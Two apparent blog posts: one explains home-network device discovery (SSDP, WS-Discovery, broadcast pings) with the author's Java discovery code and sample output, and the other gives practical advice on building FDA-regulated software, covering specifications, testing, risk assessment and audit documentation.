99% of what happens on networks is conversations between two devices that already know each other, either directly by address (like a phone number), or by a name that they use to look up an address (like using a phone book). And 99% of the time this works great — between “google.com” and QR codes and the bookmark lists we’ve all built up, there’s rarely any need to even think about addresses. But once in a while — usually when you’re trying to set up a printer or some other smarty-pants device on your home network — things get a bit more complicated.

Devices on your network are assigned a (basically) arbitrary address by your wifi router, and they don’t have a name registered anywhere, so how do other devices find them to start a conversation? It turns out that there are a pile of different ways — most of which involve either multicast or broadcast UDP messaging, two similar techniques that enable a device to initiate a conversation without knowing exactly who it’s talking to. Vox Clamantis in Deserto as it were.

Side note: for this post I’m going to limit examples to IPv4 addressing, because it makes my job a little easier. The same concepts generally apply to IPv6, except that there is no true “broadcast” with v6 because they figured out that multicast could do all the same things more efficiently, but close enough.

An IP broadcast message is received by all devices on the local network that are listening on a given port. Typically these use the special “limited broadcast” address 255.255.255.255 (there’s also a “directed” broadcast address for each subnet which could theoretically be routed to other networks, but that’s more detail than matters for us). An IP multicast message is similar, but is received only by devices that have subscribed to (or joined) the multicast’s special “group” address. Multicast addresses all have 1110 as their most significant bits, which translates to addresses from 224.0.0.0 to 239.255.255.255.
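The "1110" rule is easy to check in code. The sketch below (class and method names are just for illustration) masks the top four bits of the first octet, and the main method compares the result against the JDK's own InetAddress.isMulticastAddress.

```java
import java.net.InetAddress;
import java.net.UnknownHostException;

class MulticastCheck {

    /** True when the top four bits of the first octet are 1110 (224 through 239). */
    static boolean isMulticastV4(String dotted) {
        int firstOctet = Integer.parseInt(dotted.substring(0, dotted.indexOf('.')));
        return (firstOctet & 0xF0) == 0xE0;
    }

    public static void main(String[] args) throws UnknownHostException {
        String[] samples = { "224.0.0.0", "239.255.255.250", "255.255.255.255", "192.168.86.47" };
        for (String s : samples) {
            // getByName does no DNS lookup when handed a literal address.
            boolean jdkSays = InetAddress.getByName(s).isMulticastAddress();
            System.out.println(s + " multicast? " + isMulticastV4(s) + " (JDK: " + jdkSays + ")");
        }
    }
}
```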

Generally, these messages are restricted to your local network — that is, routers don’t send them out onto the wider Internet (there are exceptions for complex corporate-style networks, but whatever). This is a good thing, because the cacophony of the whole world getting all of these messages would most definitely take down the Internet. It’s also safer, as we’ll see a bit later.

Roku and SSDP

OK, back to the main thread here. Per the ECP documentation, Roku devices use Simple Service Discovery Protocol for discovery. SSDP defines a multicast address (239.255.255.250) and port (1900), a set of messages using what old folks like me still call RFC 822 format, and two interaction patterns for discovery:

  1. A client looking for devices sends a multicast M-SEARCH message with the type ssdp:discover, setting the ST header to either ssdp:all (everybody respond!) or a specific service type string (the primary Roku type is roku:ecp). AFAIK there is no authoritative list of ST values, you just kind of have to know what they are.  Devices listening for these requests respond directly to the client with a unicast HTTP OK response that includes (thank you) addressing information.
  2. Clients can also listen on the same multicast address for NOTIFY messages of type ssdp:alive or ssdp:byebye; devices send these out when they are turned on and off. It’s a good way to keep a list of devices accurate, but implementations are spotty so it really needs to be used in combination with #1.
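To make the first pattern concrete, here is a rough sketch of what goes over the wire. It builds an M-SEARCH request and pulls headers out of a response; the class name is invented, the MX value is an assumption (it is the maximum number of seconds a device may wait before answering), and the sample response is hand-written for illustration rather than captured from a device.

```java
import java.util.LinkedHashMap;
import java.util.Locale;
import java.util.Map;

class SsdpMessages {

    /** Builds an ssdp:discover request for the given search target (ST). */
    static String buildSearch(String st, int mxSeconds) {
        return "M-SEARCH * HTTP/1.1\r\n"
             + "HOST: 239.255.255.250:1900\r\n"
             + "MAN: \"ssdp:discover\"\r\n"
             + "MX: " + mxSeconds + "\r\n"
             + "ST: " + st + "\r\n"
             + "\r\n";
    }

    /** Parses "Name: value" lines after the start line; header names are upper-cased. */
    static Map<String, String> parseHeaders(String message) {
        Map<String, String> headers = new LinkedHashMap<>();
        String[] lines = message.split("\r?\n");
        for (int i = 1; i < lines.length; i++) { // index 0 is the start line
            int colon = lines[i].indexOf(':');
            if (colon <= 0) continue;            // blank or malformed line
            headers.put(lines[i].substring(0, colon).trim().toUpperCase(Locale.ROOT),
                        lines[i].substring(colon + 1).trim());
        }
        return headers;
    }

    /** Illustrative response only; real devices send more headers than this. */
    static final String SAMPLE_RESPONSE =
          "HTTP/1.1 200 OK\r\n"
        + "Cache-Control: max-age=3600\r\n"
        + "ST: roku:ecp\r\n"
        + "USN: uuid:roku:ecp:2N006D062746\r\n"
        + "LOCATION: http://192.168.86.47:8060/\r\n"
        + "\r\n";

    public static void main(String[] args) {
        System.out.print(buildSearch("roku:ecp", 3));
        System.out.println(parseHeaders(SAMPLE_RESPONSE).get("LOCATION"));
    }
}
```

Only the first colon on each line splits name from value, which matters because the LOCATION and USN values contain colons of their own.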

An SSDP client in Java

Seems simple, right? I mean, OK, the basics really are simple. But a robust implementation runs into a ton of nit-picky little gotchas that, all together, took me days to sort out. The end result is on github and can be built/tested on any machine with java, git and maven installed (be sure to fix up slashes on Windows):

git clone https://github.com/seanno/shutdownhook.git
cd shutdownhook/toolbox
mvn clean package
java -cp target/toolbox-1.0-SNAPSHOT.jar \
    com.shutdownhook.toolbox.discovery.ServiceDiscovery \
    ssdp

This command line entrypoint just sends out an ssdp:discover message, displays information on all the devices that respond, and loops listening for additional notifications. Somebody on your network is almost sure to respond; in particular for Roku you can look for a line something like this:

+++ ALIVE: uuid:roku:ecp:2N006D062746 | roku:ecp | http://192.168.86.47:8060/ | (/192.168.86.47:1900)

Super cool! If you open up that URL in a browser you’ll see a bunch more detail about your Roku and the interfaces it supports.

Discovery Protocol Abuse

If you don’t see any responses at all, it’s likely that your firewall is blocking UDP messages either to or from port 1900 — my Linux Mint distribution does both by default. Mint uses UncomplicatedFirewall which means you can see blocking activity (as root) in /var/log/ufw.log and open up UDP port 1900 with commands like:

sudo ufw allow from any port 1900 to any proto udp
sudo ufw allow from any to any port 1900 proto udp

Before you do this, you should be aware that there is some potential for bad guys to do bad stuff — pretty unlikely, but still. Any protocol that can “amplify” one message into many (because multiple devices can respond) carries some risk of a denial-of-service attack. That can be very simple: a bad guy on your network just fires off a ton of M-SEARCH requests, prompting a flood of responses that overwhelm the network as a whole. Or it can be nastier: combined with “ip spoofing,” a bad guy can redirect amplified responses to an unsuspecting victim.

Really though, it’s pretty theoretical for a home network — routers don’t generally route these messages, so it’d have to be an inside job anyways. And once you’ve got a bad actor inside your network, they can probably do a lot more damage than just slowing it down. YMMV, but I’m not personally super-worried about this particular attack. Just please don’t confuse my blasé assessment here with the risks of the related Universal Plug-and-Play (UPnP) protocol, which are quite real.

Under the Covers

There is quite a bit to talk about in the code here. Most of the hard work is in UdpServiceDiscovery.java (I’ll explain this abstraction later), which uses two sockets and two worker threads:

Socket/Thread #1 (DISCOVERY) sends M-SEARCH requests and receives back HTTP OK responses. A request is sent when the thread first starts up and can be repeated either on demand or on a timer (by default every twenty minutes).

It’s key to understand that while the request here is a multicast message, the responses are sent back directly as a unicast. I didn’t implement the server side specifically, but you can see how this works in the automated tests — the responding device extracts the source address and port from the multicast and just replies with a standard UDP unicast message. This is important for us because only one process on a computer can actively listen for unicast messages on a port. And on many systems, somebody is probably already doing that on port 1900 (for example, the Windows service “SSDP Discovery”). So if we want to reliably hear HTTP OK responses, we need to be using an unused, automatically-assigned port for this socket.

Socket/Thread #2 (NOTIFICATION) is for receiving unsolicited NOTIFY multicasts. This socket uses joinGroup to register interest and must be opened on port 1900 to work correctly.
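In java.net terms the difference between the two sockets is small. The sketch below is a simplification with made-up names, not the code in UdpServiceDiscovery.java: the discovery socket is created with no port so the OS assigns a free one, while the notification socket binds to 1900 and joins the SSDP group on a single interface.

```java
import java.io.IOException;
import java.net.DatagramSocket;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.net.MulticastSocket;
import java.net.NetworkInterface;

class TwoSockets {
    static final String GROUP = "239.255.255.250";
    static final int PORT = 1900;

    /** Discovery socket: no port argument, so the OS picks an unused one. */
    static DatagramSocket openDiscoverySocket() throws IOException {
        return new DatagramSocket();
    }

    /** Notification socket: bound to 1900 and joined to the SSDP group on one interface. */
    static MulticastSocket openNotificationSocket(NetworkInterface iface) throws IOException {
        // MulticastSocket enables SO_REUSEADDR before binding, which is what lets
        // several listeners share port 1900 for multicast traffic.
        MulticastSocket socket = new MulticastSocket(PORT);
        socket.joinGroup(new InetSocketAddress(InetAddress.getByName(GROUP), PORT), iface);
        return socket;
    }

    /** Opens and closes a discovery socket, returning the port the OS assigned (or -1). */
    static int ephemeralPort() {
        try (DatagramSocket socket = openDiscoverySocket()) {
            return socket.getLocalPort();
        } catch (IOException e) {
            return -1;
        }
    }

    public static void main(String[] args) {
        System.out.println("discovery socket would listen on port " + ephemeralPort());
    }
}
```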

forEachUsefulInterface is an interesting little bit of code. It’s used both for sending requests and joining multicast groups, ensuring that the code works in a system that is connected to multiple network interfaces (typically not the case at home, but better safe than sorry). Remember that multicasts are restricted to a local network — so if you’re attached to multiple networks, you’ll need to send out one message on each of them. The realities of coordinating interfaces with addresses can get pretty complicated, but I think this gets it right. Let me know if you think I’ve missed something!
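As a rough idea of what "useful" can mean here, the sketch below lists interfaces that are up, not loopback, multicast-capable, and carry an IPv4 address. Those filter criteria are my assumption for the illustration and may not match exactly what forEachUsefulInterface does.

```java
import java.net.Inet4Address;
import java.net.InterfaceAddress;
import java.net.NetworkInterface;
import java.net.SocketException;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Enumeration;
import java.util.List;

class UsefulInterfaces {

    /** Returns "name address" for each up, non-loopback, multicast-capable IPv4 binding. */
    static List<String> list() {
        List<String> found = new ArrayList<>();
        try {
            Enumeration<NetworkInterface> all = NetworkInterface.getNetworkInterfaces();
            if (all == null) return found; // defensive: older JDKs can return null here
            for (NetworkInterface iface : Collections.list(all)) {
                if (!iface.isUp() || iface.isLoopback() || !iface.supportsMulticast()) continue;
                for (InterfaceAddress addr : iface.getInterfaceAddresses()) {
                    if (addr.getAddress() instanceof Inet4Address) {
                        found.add(iface.getName() + " " + addr.getAddress().getHostAddress());
                    }
                }
            }
        } catch (SocketException e) {
            // In this sketch an unreadable interface list just means "nothing usable".
        }
        return found;
    }

    public static void main(String[] args) {
        for (String entry : list()) System.out.println(entry);
    }
}
```

A sender would then loop over this list and transmit one copy of the request per interface.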

The class also tries to identify and ignore duplicate UDP messages. Dealing with dups just comes with the territory when working with UDP — and while the nature of the SSDP protocol means it generally doesn’t hurt anything to re-process them, it’s just icky. UdpServiceDiscovery tries to filter them out using message hashing and a FIFO queue of recently-received messages. You can tune this behavior (or turn it off) through config; default is a two-second lookback.  
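The general technique looks something like the sketch below. This is a simplified stand-in with invented names, not the real UdpServiceDiscovery code: it keeps a FIFO of (hash, timestamp) pairs, expires anything older than the lookback window, and reports a duplicate when a matching hash is still in the queue.

```java
import java.util.ArrayDeque;
import java.util.Arrays;
import java.util.Deque;

class RecentMessageFilter {

    private static final class Entry {
        final int hash;
        final long seenAtMs;
        Entry(int hash, long seenAtMs) { this.hash = hash; this.seenAtMs = seenAtMs; }
    }

    private final long lookbackMs;
    private final Deque<Entry> recent = new ArrayDeque<>(); // oldest entry at the head

    RecentMessageFilter(long lookbackMs) { this.lookbackMs = lookbackMs; }

    /** Returns true if an identical payload was seen within the lookback window. */
    synchronized boolean isDuplicate(byte[] payload, long nowMs) {
        // Drop entries that have aged out of the window.
        while (!recent.isEmpty() && nowMs - recent.peekFirst().seenAtMs > lookbackMs) {
            recent.removeFirst();
        }
        int hash = Arrays.hashCode(payload);
        for (Entry e : recent) {
            if (e.hash == hash) return true;
        }
        recent.addLast(new Entry(hash, nowMs));
        return false;
    }

    public static void main(String[] args) {
        RecentMessageFilter filter = new RecentMessageFilter(2000);
        byte[] msg = "NOTIFY * HTTP/1.1".getBytes();
        System.out.println(filter.isDuplicate(msg, 0));    // first sighting
        System.out.println(filter.isDuplicate(msg, 1500)); // inside the window
        System.out.println(filter.isDuplicate(msg, 2500)); // original has expired
    }
}
```

Comparing hashes alone means a collision could occasionally drop a distinct message; for SSDP that seems an acceptable trade, since devices repeat themselves anyway.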

Wait, is that Everyone? Enter WS-Discovery.

If you look closely you’ll see that UdpServiceDiscovery really isn’t specific to SSDP at all — all of the protocol-specific stuff is in Ssdp.java and transits through yet another class ServiceDiscovery.java. What the heck is going on here? The short story is that SSDP doesn’t return most printers, and Microsoft always needs to be special. The longer story requires a quick aside into the insanity that was “WS*”.

Back in 1999 and 2000, folks realized that HTTP would be great for APIs as well as web pages — and two very different approaches emerged. First by a few months was SOAP (and its fast-follower WSDL), which tried to be transport-independent (although 99.9% of traffic was over HTTP) and was all about defined, strongly typed interfaces. The foil to SOAP was REST — a much lighter and Internettish way to think about machine-to-machine interaction.

SOAP was big company, REST was scrappy startup. And nobody was more SOAPy than Microsoft. They had a whole group (I’m looking at you Bill, and your buddy John too) that did nothing but make up abstract, overly-complicated, insane SOAP-based “standards” informally known as “WS*” that nobody understood or needed. Seriously, just check out this poster (really, click that link, zoom in and scroll for a while, it’s shocking). Spoiler alert: REST crushed it.

Anyways — one of these beasts was WS-Discovery, a protocol for finding devices on a network that does exactly the same thing as SSDP. Not “generally the same thing,” but exactly the same thing. The code that works for SSDP works for WSD too, just swap out the HTTP-style metadata for XML. Talk about reinventing the wheel, yeesh. But at least this explains the weird object hierarchy in my discovery classes:

Since these all use callback interfaces and sometimes you just want an answer, I added OneShotServiceDiscovery that wraps up Ssdp and Wsd like this (where “4” below is the number of seconds to wait for UDP responses to come in):

Set<ServiceInfo> infosSSD = OneShotServiceDiscovery.ssdp(4);
Set<ServiceInfo> infosWSD = OneShotServiceDiscovery.wsd(4);

There’s an entrypoint for this too, so to get a WSD device list you can use (the example is my Epson ET-3760):

java -cp target/toolbox-1.0-SNAPSHOT.jar \
    com.shutdownhook.toolbox.discovery.OneShotServiceDiscovery \
    wsd
...
urn:uuid:cfe92100-67c4-11d4-a45f-e0bb9e278967 | wsdp:Device wscn:ScanDeviceType wprt:PrintDeviceType | http://192.168.5.228:80/WSD/DEVICE | (/192.168.5.228:3702)

Actually, a full WSD implementation is more complicated than this. The protocol defines a “discovery proxy” — a device on the network that can cache device information and reduce network traffic. A proxy advertises itself by sending out HELLO messages with type d:DiscoveryProxy; clients are supposed to switch over to use this service when it’s present. So so much complexity for so so little benefit. No thanks.

Don’t forget the broadcast bunch

And we’re still not done. SSDP and WSD cover a bunch of devices and services, but they still miss a lot. Most of these use some sort of custom broadcast approach. If you poke around in UdpServiceDiscovery you’ll find a few special case bits to handle the broadcast case — we disable the NOTIFICATION thread altogether, and just use the DISCOVERY thread/socket to send out pings and listen for responses. The Misc class provides an entrypoint for this; you can find my Roomba using broadcast port 5678 like this:

java -cp target/toolbox-1.0-SNAPSHOT.jar \
    com.shutdownhook.toolbox.discovery.Misc \
    255.255.255.255 5678 irobotmcs
...
============ /192.168.4.48:5678
{"ver":"3","hostname":"Roomba-3193C60472324700","robotname":"Bellvoomba","ip":"192.168.4.48","mac":"80:91:33:9D:E2:16","sw":"v2.4.16-126","sku":"R960020","nc":0,"proto":"mqtt","cap":{"pose":1,"ota":2,"multiPass":2,"pp":1,"binFullDetect":1,"langOta":1,"maps":1,"edge":1,"eco":1,"svcConf":1}}
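Stripped to its essentials, a broadcast ping is only a few lines of java.net. The sketch below is not the Misc class itself, and it assumes the third command-line argument above ("irobotmcs") is simply the payload that gets broadcast; the class and method names are invented.

```java
import java.io.IOException;
import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;
import java.net.SocketTimeoutException;
import java.net.UnknownHostException;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;

class BroadcastPing {

    /** Builds a packet addressed to the limited broadcast address on the given port. */
    static DatagramPacket buildPing(String payload, int port) {
        byte[] data = payload.getBytes(StandardCharsets.UTF_8);
        try {
            InetAddress limited = InetAddress.getByAddress(
                new byte[] { (byte) 255, (byte) 255, (byte) 255, (byte) 255 });
            return new DatagramPacket(data, data.length, limited, port);
        } catch (UnknownHostException e) {
            throw new IllegalStateException(e); // not reachable for a 4-byte address
        }
    }

    /** Sends one ping and collects replies until a receive times out. */
    static List<String> pingAndListen(String payload, int port, int timeoutMs) throws IOException {
        List<String> replies = new ArrayList<>();
        try (DatagramSocket socket = new DatagramSocket()) {
            socket.setBroadcast(true);
            socket.setSoTimeout(timeoutMs); // applies to each receive, not the whole loop
            socket.send(buildPing(payload, port));
            byte[] buf = new byte[4096];
            while (true) {
                DatagramPacket reply = new DatagramPacket(buf, buf.length);
                try {
                    socket.receive(reply);
                } catch (SocketTimeoutException e) {
                    break;
                }
                replies.add(reply.getSocketAddress() + " "
                    + new String(reply.getData(), 0, reply.getLength(), StandardCharsets.UTF_8));
            }
        }
        return replies;
    }

    public static void main(String[] args) throws IOException {
        for (String reply : pingAndListen("irobotmcs", 5678, 2000)) System.out.println(reply);
    }
}
```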

Sometimes you don’t even need a ping. For example, devices that use the Tuya platform just sit there and constantly broadcast their presence on port 6666 or 6667:

java -cp target/toolbox-1.0-SNAPSHOT.jar \
    com.shutdownhook.toolbox.discovery.Misc \
    255.255.255.255 6667 tuya
...
============ / 192.168.5.253:60913
????1r???8?W??⌂???▲????H??? _???r?9???3?o*?jwz#?$?Z?H?¶?Q??9??r~  ?U

OK, that’s not super useful — it’s my smart ceiling fan, but apparently not all of their devices broadcast on 6666, and the messages on port 6667 are encrypted (using a global key, duh — this code shows how to decrypt them). This kind of thing annoys me because it doesn’t really secure anything and just makes life harder for everyone. I’m going to register my protest by not writing that code myself; that’ll show them.

In any case, you get the point — there are a lot of ways that devices try to make themselves discoverable. I’ve even seen code that just fully scans the network — mini wardialers that check every possible address for specific open ports (an approach that won’t survive the eventual v4-v6 address transition!). It’d be nice if this was more standardized, but I’m happy to live with a little chaos in return for the innovations that pop up every day. It’ll settle out eventually. Maybe.

Now back to that Roku app, which will use something like 5% of the code I wrote for this post. Just one of the reasons I’m a fan of retirement — I can burn cycles on any rabbit hole I damn well please. Getting the code right can be tricky, so perhaps it’ll prove useful to some other nerd out there. And as always, please let me know if you find a bug!

Regulated software for software people

If you’ve built software at any scale, you know how the game works. You get requirements from somewhere — usually they’re wrong or at best incomplete. You do your best to implement and test them, and you ship. Users vote with their clicks as to what features work and which don’t — i.e., they refine the requirements for you — and then you repeat the process. Eventually you converge to a set of features that work, then you do it all over again with a new set of requirements.

If your cycle time is long, that’s called “waterfall” and folks judge you for it, which is sometimes fair but not always. If your cycle time is short, it’s called “agile.” Agile does have some advantages: user feedback gets incorporated more quickly, and doing things in smaller chunks generally results in fewer bugs. A lot of people have written a lot of boring religious articles about the differences here, but in reality most folks fall somewhere in the middle, and it’s usually fine. If you’re building the next Tinder or Candy Crush or whatever, that’s pretty much all the “process” you need to know.

But what if you’re building something for healthcare or another industry where the software is “regulated?” Oh my. “Regulation” is scary and mysterious, and people keep talking about going to jail. There’s a whole industry that as far as I can tell is built around paying protection money to consultants. So it’s not surprising that “regulated” in a software job description is a turn-off for lots of people. Still, it’s the cost of doing business for a lot of important things in the world, so let’s take a look at what’s really going on there.

An important caveat: I have never worked for the FDA or any regulatory agency. I’m not a lawyer. I’m just a guy who has written a bunch of regulated software and believes the advice I’ve received from the “regulatory industry” has been almost entirely crap (a very few people break that mold; you know who you are). My hope here is to give you a straightforward, clear-cut introduction so that you can enter into the process with enough confidence to avoid being bullied by silly hyperbole about going to jail or other craziness. The actual regulators I’ve known just expect you to do your best to build safe, reliable products, and they get that it’s a hard job. Understanding a few key things will not only keep you compliant, it will help you build better stuff. Honest.

The Big Secret

Most of my big-time regulatory work has been with FDA Class 1 and 2 medical devices. “Classification” is a risk stratification based on your “intended use” — a super-important bit of text that precisely defines what your device is supposed to do and how it’s supposed to be used. Nailing these down can be a fraught and expensive process all on its own.

But we’re getting ahead of ourselves here — a common problem in this space! In this piece I’m not going to go deep into the details of any specific regulation — because (cover your ears regulatory folks) they don’t really matter to you. OK, maybe they matter if you’re in a startup and you’re the one that has to actually do the filings … but that’s probably a horrible idea anyways. From a software perspective, pretty much all safety-focused regulation looks exactly the same and can be satisfied by adhering to a set of relatively small and, dare I say, pretty reasonable requirements.

This is a bigger secret than you might think. Thanks to the impenetrable nature of regulatory jargon and text, folks that can claim actual experience are in high demand. It’s to their advantage and job security to make it seem super complicated — nobody wants to go to jail, so we all just keep paying for vague explanations and double-talk. Of course that’s a broad brush —  but it’s more right than wrong.

Software first, not Regulation first

This is my biggest regret from my last regulated gig. I had stepped into a higher risk class of device, and we had hired a set of regulatory folks with no direct software experience. The company was very focused on agency approval, so there was a ton of pressure to get it “right.” Not good excuses, but it is what it is — I let our initial software processes be driven by regulation first. That’s not to say we didn’t build excellent software, because we did — but we did it with a very high burden on the team that honestly was mostly just wasted time and energy. I was lucky to lose only a couple of good people to the noise before we got things more-or-less straightened out.

Your job is to build great software. Finish reading this article, understand what you really need to be able to prove and document, talk to folks you trust, and then use your own software-focused best practices to meet the regs. It is the job of your regulatory team to take what you produce and “package” it into the right form for filings and auditors. This packaging takes work and a depth of understanding not many folks in the industry bring, so you’re probably going to get pushback. Stand your ground. Over time, it is for sure worth adding automation to generate different forms of documentation (this is where we finally ended up) and that’s great — but be confident that, if you execute well, you need not be bound by crazy redundant busywork.

Safety-based regulation in three bullets

Software regulation isn’t really intended to protect against bad or fraudulent actors — there are other laws for that. Instead, the point is to ensure that the specific risks and benefits associated with a product are understood and visible. From a software perspective, that means three things:

  1. You know what it’s supposed to do.
  2. It does what you expect.
  3. You’ve considered the risks.

The first two of these should look pretty familiar. #1 just says that you have a correct and detailed specification. #2 says you tested the software against that specification. These might need to be a bit more formal than you’re used to, but if you don’t have a good starting point, your product probably sucks anyways. You likely already use JIRA or some other system to track features/stories and bugs, so if you can generate the following reports you’re basically done with these first two requirements:

  • A list of features, each with sufficient detail to be implemented.
  • For each feature, a list of test cases that cover the feature.
  • For each test case, a record of each time it was executed and passed or failed.

Formal documentation of test cases and results — and especially links back to the specific features they exercise — can be pretty thin at many companies, where dedicated QA resources are hard to come by. If your tests are automated, a great start is just to log feature IDs along with each test case you run. Together with code coverage reports, that gets you a long way towards compliance. For manual test cases, you will need some way to keep track of things — I’ve used the Zephyr plugin for JIRA with good success, but there are tons of options out there.
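As a sketch of what "log feature IDs along with each test case" might look like, here is a tiny in-memory version. The class name, the feature IDs, and the test names are all invented for the example; in practice the records would be written somewhere durable and tied back to your tracking system.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.TreeMap;

class TraceabilityLog {

    private static final class Run {
        final String featureId;
        final String testCase;
        final boolean passed;
        Run(String featureId, String testCase, boolean passed) {
            this.featureId = featureId;
            this.testCase = testCase;
            this.passed = passed;
        }
    }

    private final List<Run> runs = new ArrayList<>();

    /** Called by the test harness each time a test case finishes. */
    void record(String featureId, String testCase, boolean passed) {
        runs.add(new Run(featureId, testCase, passed));
    }

    /** Groups every recorded run under the feature it exercises, sorted by feature ID. */
    Map<String, List<String>> byFeature() {
        Map<String, List<String>> report = new TreeMap<>();
        for (Run r : runs) {
            report.computeIfAbsent(r.featureId, k -> new ArrayList<>())
                  .add(r.testCase + (r.passed ? " PASS" : " FAIL"));
        }
        return report;
    }

    public static void main(String[] args) {
        TraceabilityLog log = new TraceabilityLog();
        log.record("FEAT-12", "alertSentOnAbnormalResult", true);
        log.record("FEAT-12", "alertSkippedOnNormalResult", false);
        log.record("FEAT-7", "loginRejectsBadPassword", true);
        System.out.println(log.byFeature());
    }
}
```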

Risk Assessment

Documented risk assessment (#3) is new to a lot of folks. The concept can take a bit of getting used to, because if you’re good at your job you’ve been assessing and addressing risks implicitly all along. Is there enough contrast to read this text in high-light situations? Will users understand what “accept” means in this situation? What happens if the user doesn’t scroll down to read the whole message? And so on. By the time you sit down for a “formal” risk analysis, you’ve probably taken care of most issues already.

And yet it’s a requirement to document a formal risk assessment for each feature. The best way I’ve found to manage this is to add a custom field to the requirements management system for risks, and ask folks to just make notes there along the way. Towards the end of the development phase, have the team sit down and clean them up and spend a bit of time thinking about anything missed. That meeting tends to be pretty quick and actually serves as a nice double-check. Ultimately you’ll want to document four things for each risk identified:

  • What could happen.
  • The potential impact.
  • Some idea of how likely and how severe this would be (more on this below).
  • What you’ve done to mitigate or reduce the risk.

There are tons of rubrics for codifying “likelihood” and “severity” — red zone / green zone kind of stuff. I’m torn about these — there is definitely validity to the balance between risks that might cause actual physical harm but are so unlikely to occur that it would be silly to spend time on them, versus risks that have almost no real impact but could happen so frequently that it justifies extra work. But trying to get too precise is really quite hopeless — I’d just estimate low/medium/high on both dimensions and leave it at that.

Potential bugs are not “risks.” Of course bad code can cause all kinds of problems — but trying to capture that is a useless shell game. That “risk” applies to every feature, and the only mitigation is to develop and test better. Documenting this is useless. Software risks generally come down to user interface confusion, algorithms that break down given extreme inputs, that kind of thing. Honest, it gets easier once you do it for a while.

Lastly, “documentation” or “user education” is a totally reasonable way to mitigate some risks. Sometimes something important is just complicated, and the user cannot be expected to understand how to use a feature without training and/or documentation. That’s OK! Just don’t use it as a crutch for bad design — your job after all is to build a helpful product, not an obtuse one. A trick that can increase the effectiveness of “mitigation by documentation” is to put the documentation directly into the user experience. For example, the first time the user clicks a particular button you might proactively pop up a dialog that can be dismissed once acknowledged.

The “Manufacturing” gotcha

Hopefully so far you’re feeling OK about all of this. A few tweaks to very standard practices and you’re pretty much capturing all the raw material you need. Woot! Ah, but wait.

Almost for sure you’re building modern software that runs as a service (in the cloud or otherwise), releasing new functionality on a regular basis — and that can make documentation a lot trickier. Maybe I should have mentioned this earlier, but I didn’t want to scare you off. Don’t worry, it’ll be ok.

Traditional medical devices are “things” — tongue depressors, MRI machines, cancer drugs, and so on. A great deal of up-front thought and effort and cost goes into figuring out what to make and how to make it. Prototypes are created. Factories and factory lines are set up. Raw materials are sourced. And then when you’re done, you flip a switch and stamp out thousands or millions of copies, exactly the same way, for years. Within that context, safety-based regulation makes a ton of sense. It expects to see “a” design record for each device. Auditors come in and ask to see “the” documents for a given product.

This worked ok when software shipped on a CD in a box. But when it runs as a service, updated and improved over many iterations in near real-time, things can get messy pretty quickly. Note this isn’t about “waterfall” vs. “agile,” it’s about frequent, incremental releases over time vs. one-and-done “manufacturing.”

My first stab at this didn’t work super-well. We basically just wrapped up each release, no matter how small, into its own set of documents — features, risks, test cases and results. When we did our first independent audit (internal, thankfully) the auditor asked for the documents for product X. I handed over dozens of these release packages and smiled confidently. We did a cool demo. They then said OK, you showed me this feature that does Y, where are the test results that prove it works? Seems like a reasonable request.

Yikes. Like almost every feature, this one had evolved over time. There were probably twenty stories related to it, scattered across dozens of releases, each one incremental, like “add option Z to the menu.” Was all the information there? Sure, you could figure it out if you really understood the product and had a couple of days to sort through it all. But answering that seemingly simple question in real time in the auditing room? No chance. And while I did say that it was the responsibility of your regulatory team to “package” your raw documents into something palatable to an auditor, this kind of synthesis is way too much to ask.

I’m sure there are many ways to address this issue, but we settled on something we called a “component document.” This was a single, authoritative, narrative document that could be used as the starting point for anybody trying to understand what the product did. It explained its purpose, the general approach to building it, and each major feature or feature area, assigning a unique identifier to each. The document was meant to be largely stable — that is, day-to-day features and bug fixes did not require changes to the text. An example might be a component-level feature that says “abnormal results will cause an alert to be sent to the medical team;” a corresponding release-focused requirement might describe specific alert conditions and channels for notification (like email). Adding SMS alerting would be a new requirement in a new release, but wouldn’t require updates to the component document.

By explicitly associating every requirement with a “component-level” feature, it became trivial to assemble coherent documentation packages. There were other benefits as well — for example, we found that if a requirement triggered a text change in the component document, it almost always warranted a full test pass rather than something more targeted. And the component document was a fantastic training vehicle for new engineers and even end users. It certainly isn’t always the case, but this time the regulatory framework really did directly help us improve our development process. Love that!
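To make that linkage concrete, here is a minimal sketch of how release-level requirements might hang off component-level features. Everything in it is hypothetical: the identifiers (`ALERT-1`, `REQ-101`), the field names and the `package_for_feature` helper are made up for illustration and are not taken from any real tooling.

```python
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class Requirement:
    """A release-level requirement tied to one component-level feature."""
    req_id: str
    release: str
    feature_id: str  # identifier assigned in the component document
    text: str
    test_results: list = field(default_factory=list)


def package_for_feature(requirements, feature_id):
    """Collect every requirement (and its tests) for one feature, keyed by release."""
    by_release = defaultdict(list)
    for req in requirements:
        if req.feature_id == feature_id:
            by_release[req.release].append(req)
    # Plain string sort; good enough for this sketch's single-digit releases.
    return dict(sorted(by_release.items()))


# Hypothetical data: two alerting stories from different releases, one unrelated.
requirements = [
    Requirement("REQ-101", "1.0", "ALERT-1", "Email the medical team on abnormal results", ["TC-7: pass"]),
    Requirement("REQ-214", "1.4", "ALERT-1", "Add SMS as an alert channel", ["TC-31: pass"]),
    Requirement("REQ-150", "1.2", "REPORT-2", "Export results as PDF", ["TC-12: pass"]),
]

alert_package = package_for_feature(requirements, "ALERT-1")
for release, reqs in alert_package.items():
    for req in reqs:
        print(release, req.req_id, req.text, req.test_results)
```

When the auditor asks "where are the tests for feature Y?", the answer becomes a single lookup by feature identifier rather than a two-day archaeology project.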

Almost there… honest!

At this point you should feel confident that you can build software in a way that satisfies the intent of safety-focused regulation. You understand and can explain what you’re building, you have tested it appropriately, you have assessed risks to health and safety — and you have the documents to prove it in an audit setting. This is really good, and frankly notably better than many self-claimed “compliant” software shops I’ve seen in real life. There is no orange jumpsuit in your future (at least for this reason).

That said, there are always more concepts in the regulatory framework you should be thinking about and evolving towards. None of these are all that challenging, and you should at least be prepared to explain to auditors how you think about them:

“V”erification vs “V”alidation

“V&V” is often used as a synonym for “testing” — which is pretty close, but obscures an important distinction between the two that you’ll need to address:

  • “Verification” ensures that features work as they are specified. It makes no judgment about whether the features do the “right” thing, just that they meet the spec.
  • “Validation” ensures that features do what users need them to do. It is really a test of the specifications themselves.

